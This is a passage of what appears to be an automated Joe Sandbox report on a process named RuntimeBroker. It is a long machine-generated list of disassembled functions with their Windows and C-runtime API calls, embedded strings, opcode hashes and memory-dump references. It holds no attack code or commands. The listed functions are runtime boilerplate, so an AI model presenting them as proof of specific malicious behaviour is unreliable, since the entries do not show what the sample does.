                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A5E7
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A61D
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A64A
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A65B
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A66C
                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A687
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                • Instruction ID: 5154325346bcd13582cde51b916ee0997c9659df550ba03f4b500074696e9fc0
                                                                                                                                                                                • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                • Instruction Fuzzy Hash: 77113B20F0824246FA76772E5E95139E142DF5C7B0F845738E93E066F6DE2CE4814F21
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                • API String ID: 2889003569-2084237596
                                                                                                                                                                                • Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                                                                                                                                                • Instruction ID: 8520f48301e4b5d51ee2bfa7d64736e7c9ea5b307fa5fb4d4542c2f9635f92c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D917F73A087858AE710CF69E8902AD7BA1FB44788F24413AEF8D17765DF38D595CB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                • API String ID: 2943138195-757766384
                                                                                                                                                                                • Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                                                                                                                                                • Instruction ID: 70e35c5adab4cd1a41446c963ebb9748e689650ba0691d4e14064a421457ef3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 15717D72A88A4296EB24CF2CD9A11BC77A6BF05780F444535EB5D03AB8DF3DE650C348
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                • API String ID: 2889003569-2084237596
                                                                                                                                                                                • Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                                                                                                                                                • Instruction ID: 8f5be70b64b7ac49139c8b005d5f31803d26d28d6e25b41483b0dca130c1c6b3
                                                                                                                                                                                • Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                                                                                                                                                • Instruction Fuzzy Hash: B8617A77A48B858AE724CF69D4903AD77A2FB44B88F244225EF4D13B68DF38E155C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                • Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                                                                                                                • Instruction ID: b523bfab92ddce5909999e6465ec525f404d981f6fbb7e028b73b5c6873eeaff
                                                                                                                                                                                • Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                                                                                                                • Instruction Fuzzy Hash: 28316572609A8285EB35EF65EC552F9A360FF89794F840135EA4D4BB69DF3CD104CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                • API String ID: 1878133881-640379615
                                                                                                                                                                                • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                • Instruction ID: af1387d9db9d7d3bf83509ff0e6c4c7990992e76bb330028233f50d2ce082711
                                                                                                                                                                                • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 1521627261868581F631AB14F8917EAE364FF84788F805036E68C03AA9DF7CD645CF50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                • Instruction ID: 8e3b3e306574e7f61bf58f8bf8c1e9b279429b4e0d4639f729e3fe6385c65779
                                                                                                                                                                                • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                • Instruction Fuzzy Hash: B0F04F21B1970282EA21AB28AC58379D360EF49761FD4063AC66E462F4CF2CE549DB24
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NameName::$Name::operator+
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 826178784-0
                                                                                                                                                                                • Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                                                                                                                                                • Instruction ID: e00e91e8b42b9cbbff85c171102a08c2e525794817f1ff8698ecb87524b6d61f
                                                                                                                                                                                • Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                                                                                                                                                • Instruction Fuzzy Hash: F8417922BA8B5695EB10CB29D8A01BC33B6BF55B80F544032EB5E137A5DF3DE855D308
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                • Instruction ID: cdbec39fe88b8b913bc251ff7848899eab10ab288a91432b798b2634b240b1d5
                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A119D22E18B0615F676332EEC55375C140EF54374FA58634EA6F066FADE6CB880A938
                                                                                                                                                                                APIs
                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6BF
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6DE
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A706
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A717
                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A728
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                                • Instruction ID: 1364caece26dab5515411e034ba650f93c67f1b4400aaee923452db8bc1a894e
                                                                                                                                                                                • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                                • Instruction Fuzzy Hash: AE112E60B0824241FA7A732E5D45579A191DF5C3A0E848338E83D066F6DE2CF9414E21
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                                • Instruction ID: e1e106ad7c24c868b650aa32ceaa768513105a404262aad3cbfed5e7d7309070
                                                                                                                                                                                • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                                • Instruction Fuzzy Hash: C811AF60F0820742FABBB32E5C55179A282DF4D360E98463CD93E0A6F2ED2CB4814E25
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                • Instruction ID: b2c19d59ef05b815ccca853d3ac178b81d870d9a207edadf02daf4337dd2a9e1
                                                                                                                                                                                • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                • Instruction Fuzzy Hash: B191B232B08A4A41E772AF29D85137DB691FB48B58FC8413ADB5D463E6DF3CE4458B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                • Instruction ID: 4f010d35ff208d2c723585413aa800c4e70c2e295ecb55bdf8dce9ed40208194
                                                                                                                                                                                • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                • Instruction Fuzzy Hash: EB81A472F0820385F7766F2DC910279A6A0EB19B44FD5803DDA09972F6DF2DE9419F21
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E
                                                                                                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B41C3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abort
                                                                                                                                                                                • String ID: $csm$csm
                                                                                                                                                                                • API String ID: 4206212132-1512788406
                                                                                                                                                                                • Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                                                                                                                                                • Instruction ID: e94e362baacd58459c3bed5f1e436b4e642d76d0c65f6510fa9c59a3099200ce
                                                                                                                                                                                • Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F71B03294868186DB20CFA9D4A07797BA2FF04F88F048135DF8C07AAACB3CD651D749
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                • Instruction ID: 32d30eb9b581d902e34a83233bec81a9ddfc7516a7bd881ef265421ed143e5cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F51B632B196428AEB35EF1DE884A79B791FB44B88F904131DA8D43B55EF7DE841CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                • String ID: MOC$RCC
